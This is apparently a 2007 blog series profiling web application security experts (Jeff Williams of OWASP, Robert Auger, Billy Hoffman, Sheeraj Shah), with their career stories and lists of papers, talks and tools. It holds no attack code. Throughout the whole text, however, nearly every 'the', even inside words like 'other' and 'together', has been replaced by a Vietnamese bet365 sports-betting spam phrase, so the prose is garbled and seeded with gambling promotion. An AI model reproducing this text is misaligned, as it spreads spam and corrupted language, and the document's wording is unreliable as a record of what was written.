Friday, March 30, 2007

Reflection on Jeff Williams


This week on reflection need no introduction. Jeff Williams, is one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 major contributors in webappsec community. He has written many whitepapers, spoken at many conferences including Secure Software Summit, OWASP conferences, ISSA InfoSec Conference, NSA High Confidence Software and Systems Conference (HCSS), JavaOne, National Computer Security Conference (NCSC), etc, written many tools available at OWASP and also chairs OWASP foundation. Jeff Williams has done a lot of work in promoting awareness of web application security.

On his reflection, Jeff shares with us how he got into web application security and his journey with OWASP and a little bit about his personal life and interests. In his own words

“I set out to be a user interface guy, but I got into security accidentally. I was working at TRW in 1992 on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user interface for a big Navy system that just happened to be highly secure – targeting B2 in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Orange Book. I took on an R&D project to port cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user interface to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new compartmented mode workstation (what became Trusted Solaris) and I found that I really liked cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 challenge of securing such a complex system.

Then Java 1.0 came along and I got NIST and NRL funding to do security research. At cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time, we thought cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Java sandbox was a good idea, but that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re were attacks that might bypass it. So I wrote a special classloader that modified cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 bytecode to wrap security relevant method calls with a reference monitor. After that I spent several years developing a Java-based multilevel secure network guard on Trusted Solaris. That guard handled HTTP, FTP, TDS, and a number of ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r protocols – sort of a very early application firewall. But unlike cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 modern WAFs, we took a whitelist approach where you would define exactly cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 data formats and rules for allowing messages.

In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mid-90’s, I chaired cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 group that authored cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SSE-CMM, which is now ISO 21827. As it turns out, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 processes involved in systems security engineering are quite similar to those necessary for secure software development. I’m very glad to see that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 idea of assurance arguments from my work is starting to be used in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 application security world.

Then in 1998, while I was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 technical director of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Global Security Practice at Exodus Communications, a Fortune 10 company approached us and said “We’d like to host our applications with you, but we have this rule – every line of code has to be reviewed before it goes on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internet.” So I started an application security practice and started providing application assessments, developer training, and help with security requirements and architecture. We built a successful practice securing some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 biggest and most complex web applications in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world.

In April 2002, togecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r with Dave Wichers, Noelle Hardy, and some ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r great folks, I started Aspect Security to focus exclusively on application security. I just feel so fortunate to get to work with such an amazing group of consultants and customers. I’m having cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most fun of my professional career.

I first heard of OWASP in 2001 from Chuck Pfleeger (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 author of Security in Computing). The idea of a free and open community for application security was an interesting idea. At cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time, getting companies to focus on application security was difficult. In meetings with several government agencies, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y acknowledged that it was an issue, but that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y were managing to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SANS Top 20. I came home and literally in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 shower said to myself, “I wish we had an application security top ten…” So a small team of us at Aspect took cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lead in drafting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first OWASP Top Ten.

Later, Aspect donated WebGoat, a hands-on training environment for application security issues that we had developed for our courses. A huge number of organizations, including Google, use WebGoat today to teach cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir developers about application security. We started to see that participation in OWASP allowed Aspect to demonstrate our skills in a very constructive way, and many of our customers have contacted us after seeing our participation in OWASP.

I was honored to take over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 leadership of OWASP in 2003. At that time, we had a number of great contributors, but OWASP itself was just a domain name and a few small projects. So I got us set up as a 501c3 nonprofit organization and put a management structure in place. I want cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OWASP Foundation to provide a free, open, supportive community infrastructure for application security projects. We’re making cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 barriers to entry for contribution so low that security experts will be motivated to make cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 effort and share cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir expertise.

One of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 key challenges has been to ensure that OWASP is not influenced by commercial interests. When I set up cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 AppSec conference and local chapter rules, I made sure that vendors are cannot use OWASP to market cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir products. We’re also starting to ferret out abuse of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OWASP brand by companies that claim cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir products “address cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OWASP Top Ten” or enable “OWASP Compliance.” The local chapters have been growing very quickly and starting to contribute back to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rship. Our conferences have also been a great experience.

I think cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 switch to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 MediaWiki platform in 2006 was a major step for OWASP. Prior to that, contributing content was a difficult and painful process. Now, anyone can create an account and contribute easily. We have a team set up to review all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 contributions and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 number of abuses in our first year has been astoundingly low (less than 10 incidents). We’re to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 point now where we get dozens of articles and contributions every day. I don’t see how a non-open approach to building an application security body of knowledge can possibly keep up with our productivity.

We’re still a long way from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 point where a company can go to OWASP for everything cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y need in order to build, acquire, and operate secure applications… but we’ve got an incredible process and we’re working very hard to get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re.

I have a wonderful wife Jennifer and three kids, Chance (9), Zack (7), and Zoe (1). We live in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 woods and spend a lot of time outside with our four Labrador retrievers. I’m very much into sports – I rowed on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 crew team at U.Va. and still play basketball three times a week. For a while I was into extreme rollerblading and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n I got into mountain bike trials – I broke a lot of equipment, but never had any serious injuries :)"

Based out of Ashton, MD, Jeff is 39 years old and is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CEO of Aspect Security. Below are his contributions to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec community

Articles / Presentations:-

Opening cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Black Box: A Source Code Security Analysis Case Study
http://www.aspectsecurity.com/documents/Aspect_Opening_Black_Box.doc

Application Security Initiatives - The Best Defense Is a Good Offense
http://www.aspectsecurity.com/documents/Application_Security_Initiatives.htm

Let's Sue cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Idiots -- Security, Software, Contracts, and Lawyers -
White paper, The OWASP Foundation
http://www.aspectsecurity.com/article/sscl.htm

How to Build an HTTP Request Validation Engine for Your J2EE Application -
White paper, The OWASP Foundation
http://www.aspectsecurity.com/article/bld_HTTP_req_val_engine.htm

Access Control (aka Authorization) in Your J2EE Application -
White paper, The OWASP Foundation
http://www.aspectsecurity.com/article/access_control.htm

Trustworthy Java - Are your apps bulletproof? -
White paper, The OWASP Foundation
http://www.aspectsecurity.com/article/trust_java.htm

The Ten Most Critical Web Application Security Vulnerabilities -
White paper, The OWASP Foundation
http://www.aspectsecurity.com/owasp.htm

Security Code Review - cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Best Way to Eliminate Vulnerabilities in Software" -
White paper, Aspect Security
http://www.aspectsecurity.com/documents/AspectCodeReviewWhitePaper.pdf

Can a 'Social Protocol' Help Protect Privacy?
http://www.aspectsecurity.com/documents/p3p.pdf

Jini and Mobile Agent Security -
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Workshop on Agent Technologies (AT ‘98)
http://www.aspectsecurity.com/documents/jini.pdf

A Practical Approach to Improving and Communicating Assurance -
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 10th Canadian Information Technology Security Symposium (CITSS)
http://www.aspectsecurity.com/documents/Arguing.pdf

A Practical Approach to Measuring Assurance -
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 1998 Security Applications Conference (ACSAC)
http://www.aspectsecurity.com/documents/Measuring.pdf

System Security Engineering Capability Maturity Model (SSE-CMM) version 2.0 -
Released at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 21st Annual National Information System Security Conference (NISSC)
http://www.aspectsecurity.com/documents/SSECMMv2Final.pdf

Just Sick about Security -
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 New Security Paradigms Workshop
http://www.aspectsecurity.com/documents/Sick.pdf

An Enterprise Assurance Framework -
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 5th Workshop on Enabling Technologies
http://www.aspectsecurity.com/documents/WetIce.pdf

Pretty Good Assurance -
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 New Security Paradigms Workshop
http://www.aspectsecurity.com/documents/Pretty.pdf

Need for a Framework for Reasoning about Assurance -
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 International Workshop on IT Assurance and Trustworthiness (WITAT)
http://www.aspectsecurity.com/documents/Need.pdf

Assurance is an N-Space (Where N is Hopefully Small) -
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 International Invitational Workshop on Developmental Assurance
http://www.aspectsecurity.com/documents/Nspace.pdf

A Capability Maturity Model For Security Engineering -
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 6th Annual Canadian Computer Security Symposium
http://www.aspectsecurity.com/documents/CITSS94.doc

Unsafe at Any (CPU) Speed: Why We Keep Making cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Same Mistakes -
NSA High Confidence Software and Systems Conference

Web Applications: The “Last Mile” of Internet Security -
White paper, Exodus Communications

A Constructionist Approach to Law and Society -
Law and Society Seminar, Georgetown University Law Center

Interpreting Anticircumvention (DMCA) -
Advanced International Copyright Law, Georgetown University Law Center

P3I – Protection Profile Process Improvement -
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 22nd National Information System Security Conference (NISSC)
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 10th Canadian Information Technology Security Symposium (CITSS)

Windows NT Security -
17th Annual National Computer Security Conference (NCSC)

Windows NT Client Security and Windows NTAS Security -
The Local Area Network Security Conference (LANSEC)

Reusing Existing C3I Systems in a Secure Environment -
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Application of COTS and Reusable Components Conference

A Framework for Reasoning about Assurance -
Published by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 National Computer Security Center of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 NSA
Proceedings of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 11th Annual Conference on Computer Assurance (COMPASS)

Interconnecting MLS Command Centers -
White paper for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Multilevel Security Initiative at Hanscomb AFB


Tools written:-

OWASP WebGoat
http://www.owasp.org/webgoat
I built cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first WebGoat back in 1998 as a controller servlet with a few simple lessons on SQL injection, cross-site scripting, and access control. Since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n, it’s grown to have dozens of lessons and has been revamped several times. Many people have contributed to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 project and it’s still quite active.

OWASP Stinger
http://www.owasp.org/stinger
Stinger was a simple idea that every part of every HTTP request should be validated with regular expressions. A mechanism for enforcing a positive security model for validation in an application. It uses a Java “filter” to ensure that all requests are validated and even developers can’t avoid it.

OWASP PDF XSS Attack Filter
https://www.owasp.org/index.php/PDF_Attack_Filter_for_Java_EE
This was a one-night project to build a little filter that generates a token to avoid a specific very dangerous flaw in Adobe Reader.


Contributions:-

OWASP Top Ten
http://www.owasp.org/index.php/OWASP_Top_Ten_Project

OWASP Secure Software Contract Annex
http://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex

OWASP Testing Guide (Risk Rating Sections)
http://www.owasp.org/index.php/How_to_value_cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365_real_risk

OWASP Honeycomb Project (Work in progress)
http://www.owasp.org/index.php/Category:OWASP_Honeycomb_Project


Website:-

http://www.aspectsecurity.com

http://www.owasp.org


Memberships:-

OWASP Chair


Companies worked for:-

Aspect Security
Exodus Communications
Arca Systems
TRW
MITRE


Company working for:-

CEO of Aspect Security


Education:-

JD cum laude – Georgetown Law - Cyberlaw and Intellectual Property
MA – George Mason - Human Factors Engineering
BA – University of Virginia - Cognitive Psychology and Computer Science (Specialization in AI)


I am sure we will see a lot more contribution from him going forward. Though he doesn’t have a blog yet but you can find most of his work on OWASP.

Next Week – Chris Shiflett

Last Week – Robert Auger

Friday, March 23, 2007

Reflection on Robert Auger



This week on Reflection we have someone who has contributed to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec community in many different ways. We all know Robert Auger through http://www.cgisecurity.com/. CGI Security is one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 very early website on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 topic and has a wealth of information on web application security. Robert is also a Co-Founder of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Web Application Security Consortium and a founder and moderator of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 WASC mailing list. He also co-leads cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 WASC articles project. Recently he has started http://qasec.com/ where he discusses security testing in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 PDLC with an emphasis in QA. He is also leading cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 WASC Threat Classification (TC v2) project which is currently underway.

Here he shares with us how he got started in webappsec. In his own words

My interest in security sparked in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mid 90's after getting infected with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Stoned Empire Monkey Virus. I was very curious how it and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r viruses worked, executed, and hid on my machine. Around cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same time I was given access to my high school's VAX/VMS network and met up with a few people creating/setting up fake login screens/key loggers on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 dumb terminals spread throughout cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 school. This VMS network was where I learned my first language 'DCL' and helped out on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 local school student run bbs. Sometime later I started reading about 'cgi vulnerabilities' such as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 infamous 'phf vulnerability' and was amazed that with nothing more than a browser, I could take over a machine. Since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n web based attack research has been my primary hobby (ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs include finding ways to abuse crawlers and parsers, co running The Web Application Security Consortium, and whitehat/blackhat SEO research).

Based out of Silicon Valley, California, Robert is only in his late 20s, and currently works for a large multinational organization where he focuses on anything application security related. I have had cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pleasure of meeting him on a few occasions and not only he is a very friendly guy but very passionate about web application security and can speak to you for hours on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 topic. He has enormous knowledge in webappsec field and one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 very few people who also possess good knowledge of security in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Software Development Life Cycle.


Below is a list of his contributions to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec community.



Articles:-


The Cross-site Request Forgery FAQ
The Cross-site Scripting FAQ

Identifying Risks in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Development Cycle

Writing Software Security Test Cases: Putting security test cases into your test plan

Feed Injection in Web 2.0: Hacking RSS and Atom Feed Implementations

Preventing Log Evasion in IIS

Fingerprinting Port 80 Attacks: A look into web server, and web application attack signatures.
http://www.cgisecurity.com/papers/fingerprint-port80.shtml

Fingerprinting Port 80 Attacks: A look into web server, and web application attack signatures: Part Two.

Anatomy of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Web Application Worm

Challenges faced by automated web application security assessment tools


Contributions:-

Founder and Moderator of WASC 'The Web Security Mailing List' http://www.webappsec.org/lists/websecurity/

The Web Application Firewall Evaluation Criteria
http://www.webappsec.org/projects/wafec/

WASC's Threat Classification (TC)
http://www.webappsec.org/projects/threat/

Co-lead cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 WASC articles project http://www.webappsec.org/projects/articles/guidelines.shtml

The Web Application Security Consortium Web Security Glossary
http://www.webappsec.org/projects/glossary/

Distributed Open Proxy Honeypots Project
http://www.webappsec.org/projects/honeypots/

Contributor to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OWASP Application Security Testing Framework Project
http://web.archive.org/web/20030207091615/www.owasp.org/testing/

Cross-site Tracing (XST): - Research Contributor
http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf

A core contributor to Snorts web-attacks.rules rule set


Presentations:-

Zero Day Subscriptions: Using RSS and Atom Feeds As Attack Delivery Systems (Power Point) - Blackhat 2006 presentation
http://www.cgisecurity.com/papers/RSS-Security.ppt


Memberships:-

Co founder of The Web Application Security Consortium http://www.webappsec.org


Email:-

robert_@_@_@_@_@_@_webappsec.org


Blog:-

http://www.cgisecurity.com/


Website(s):-

http://www.cgisecurity.com/
http://www.webappsec.org
http://www.qasec.com/


Companies Worked for:-

SPI Dynamics, Ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r Consulting companies


Robert is a man of ideas and is already working on some very interesting projects. You should definitely keep an eye out on his websites as we will see a lot more contribution from him soon.

Last Week – Billy Hoffman
Next Week – Jeff Williams

Saturday, March 17, 2007

Reflection on Billy Hoffman


This week on Reflection we have a very young guy from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec field. Billy Hoffman is a lead security researcher for SPI dynamics where he works on discovering and automating web application vulnerabilities and improving cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir crawling technology. He has presented at a lot of conferences including (ToorCon, Black Hat, etc). Billy’s knowledge on Ajax is tremendous and he has written many papers and presented at many conferences on dangers of using Ajax. Based out of Atlanta, Georgia, he is only 26 years old, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 youngest webappsec expert I know of (I am sure cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re may be younger people too but I am yet to meet cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m) and like every webappsec expert, his ability to think differently has helped him achieve so much in such a short time. Here he shares with us how he got started in webappsec field. In his own words

“I got started in fall of 1996. My older brocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r had left for college and he was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 one who understood computers. One day cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 computer stopped working and I wanted to play Doom. So I started fiddling with it and fixed it. About this time I also got a graphing calculator for geometry, so I spend my days writing programs for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 TI-85 in Basic and z80 assembler, and my nights writing Basic and learning C. Soon afterwards I actually used one of those AOL disks, discovered cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internet, and learned how to create fake accounts and phish people in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 New User Lobby. I wasn’t much of a network guy, let a lone a web hacking guy. In college most of my hacking was focused on hardware or ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r things that popped on my radar like spy software. I met Caleb Sima, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 co-founder and CTO of SPI Dynamics at an Atlanta hacker conference, and he told me to come in for an interview. I was amazed by how vulnerable companies were through cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir websites. I started in QA, where my job was to verify our crawler and audit engines worked properly. Pretty quickly I saw ways we could improve both, I am now cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lead researcher focusing on crawlers and automated vulnerability detection. I continue to speak at security conferences much like I did in college. The only differences now are I speak under my real name, I have an expense report, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are more middle aged men in Dockers and polos and fewer guys in black t-shirts and green hair! I’ve done a good bit of non-web stuff too. Mainly lots of presentations at different conferences (Interz0ne, Phreaknic, The Fifth Hope), some articles for 2600, O’Reilly’s Make Magazine, etc.”

I got a chance to meet with him in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 WASC meetup at RSA. He is a very lively character. Let me put it this way, if billy is a part of a conversation, you won’t get bored even if you just stand cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re and listen. Below is a list of his contribution to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 industry.


Books:

Upcoming book from Addison Wesley this summer tentatively titled “Securing Ajax Applications”


Articles:

“Patching cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Holes in Ajax Security,” Cover Story, Software Test and Performance Magazine
http://www.stpmag.com/issues/stp-2007-01.pdf

Stealing Search Engine Queries with JavaScript –
http://www.spidynamics.com/spilabs/education/articles/JS-search.html

Detecting, Analyzing, and Exploiting Intranet Applications using JavaScript –
http://www.spidynamics.com/spilabs/education/articles/JS-portscan.html

Application Error Handling: How to Avoid Death by a Thousand Cuts
http://www.spidynamics.com/spilabs/education/articles/application-error.html

Security Brief - Yamanner Web Worm
http://www.spidynamics.com/spilabs/education/articles/Yahoo-AJAXworm.html

Security Brief – MySpace Quicktime Web Worm
http://www.spidynamics.com/spilabs/education/articles/MySpace-QuickTime%20Worm.html

Ajax Security Dangers Whitepaper
http://www.spidynamics.com/assets/documents/AJAXdangers.pdf

Buiding a Magstripe reader, Cover Story, O’Reilly’s Make Magazine, Issue 1
http://makezine.com/01/magstripe/


Presentations/Conferences:

JavaScript Malware for a Grey Goo Tomorrow - Toorcon 8, Security Opus 2006
http://www.shmoocon.org/schedule.html

Ajax (in)security – BlackHat USA 2006, AJAXWorld, InfoSecurity Canada , SPICON, RSA Conference 2007
http://www.spidynamics.com/spilabs/education/presentations/BillyHoffman-Ajax(in)security.pdf

Analysis of Web Application Worms and Viruses – BlackHat USA 2006 and BlackHat Federal 2006
http://www.spidynamics.com/spilabs/education/presentations/billyhoffman-web_appworms_viruses.pdf

Covert Crawling: A Wolf Among Lambs – Shmoocon 2006, LayerOne 2006. Technology for this talk is used by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 MITRE honeyclient project.
http://www.spidynamics.com/spilabs/education/presentations/crawling.html

Layer 7 Fun: Extending Web Apps in Interesting Ways – Phreaknic 9
http://www.msblabs.org/talks/index.php#extending-webapps

Phuture of Phishing – Toorcon 7, FBI Cyber Security Summit
http://www.spidynamics.com/spilabs/education/presentations/phishing.html

Proof of Concepts:

Stealing Search Engine queries with JavaScript
http://www.spidynamics.com/spilabs/js-search/index.html

Portscanning and fingerprinting with JavaSript
http://www.spidynamics.com/spilabs/js-port-scan/

TinyDisk – Filesystem mashup that stores and retrieves data in TinyURL
http://www.msblabs.org/tinydisk/index.php


Memberships:

“Well, ain't it a small world, spiritually speaking. Pete and Delmar just been baptized and saved. I guess I'm cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 only one that remains unaffiliated.” –Oh Brocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r Where Art Thou


Tools:

StripSnoop - Suite of research tools that captures, modifies, validates, generates, analyzes, and shares data from magstripe cards. This has received a lot of attention, having been Slashdotted twice, appeared on G4TechTV’s The Screen Savers, and at O’Reilly Emerging Technologies Conference Makers Faire.
http://stripesnoop.sourceforge.net/

Phasmatis – Read and Edits captured data from SpectorSoft’s computer monitoring software
http://phasmatis.sourceforge.net/

TinyDisk – Filesystem mashup that stores and retrieves data in TinyURL
http://www.msblabs.org/tinydisk/index.php

NanoURL – Web Application that provides link shortening services exactly like TinyURL
http://www.msblabs.org/nanourl/index.php

LineBreaker – Anti Phishing Web proxy, released at Toorcon 2005
http://www.spidynamics.com/LineBreaker.zip


Company working for:

SPI Dynamics



Blog:



Website:

Most Significant Bit Labs
http://www.msblabs.org/


Companies worked for:

Crawford and Company, and NetEffects


Education:

BS in Computer Science from Georgia Tech, graduated in 2005.


Billy has a very sharp mind and is very passionate about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec field. He has a bright career ahead of him and is definitely amongst cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ones to follow.

Last Week : Sheeraj Shah
Next Week : Robert Auger

Friday, March 09, 2007

Reflection on Sheeraj Shah



This week on Reflection we have anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r big contributor to webappsec field. Sheeraj Shah is a founder of Net Square Solutions where he performs consulting, training and R&D activities. He has done a lot of research on web application and web services security. Sheeraj started with web application security in mid 2000 when he was working on WebLogic application server and discovered some architecture level security issues. He quickly found out similar issues in ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r products like WebSphere, JRun, Java Web Server etc. and posted a lot of advisories on SecurityFocus. Since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n he has performed numerous network security pen testing and application assessments for many significant companies.


Based out of Ahmedabad, India, Sheeraj is 31 years old and has a lot of experience in web application security and has authored a couple of books, published many articles, presented at many conferences (including Blackhat, HackInTheBox, RSA, etc), and posted several vulnerabilities and advisories at securityfocus. Below is a compilation of most of his work including article, whitepapers, books, presentations, etc


Books:-

Hacking Web Services (Thomson 06)

Web Hacking – Attacks & Defense (AWL 03)


Articles:-

Stateful Web Application Firewalls with .NET
http://www.informit.com/articles/article.asp?p=694855&rl=1

Ajax Fingerprinting for Web 2.0 Applications
http://www.net-security.org/article.php?id=976

Detect Your Web Application's Vulnerabilities Early with Ruby
http://www.devx.com/security/Article/33559

Crawling Ajax-driven Web 2.0 Applications
http://www.net-security.org/article.php?id=973

XSRF attack vector with Ajax serialization
http://searchappsecurity.techtarget.com/tip/0,289483,sid92_gci1235537,00.html

Vulnerability Scanning Web 2.0 Client-Side Components
http://www.securityfocus.com/infocus/1881

Web 2.0 defense with Ajax fingerprinting & filtering
http://www.insecuremagazine.com/INSECURE-Mag-9.pdf

Top 10 Ajax Security Holes and Driving Factors
http://www.net-security.org/article.php?id=956

Detecting Web Application Security Vulnerabilities
http://www.oreillynet.com/pub/a/sysadmin/2006/11/02/webapp_security_scans.html

Hacking Web 2.0 Applications with Firefox
http://www.securityfocus.com/infocus/1879

Top 10 Web 2.0 attack vectors
http://www.net-security.org/article.php?id=949

Assessing Web App Security with Mozilla
http://www.onlamp.com/pub/a/security/2005/10/20/web_vulnerabilities.html

Protect your applications without recoding cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m
http://www.onlamp.com/pub/a/onlamp/2005/06/09/wss_security.html

Web Services - Attacks and Defense
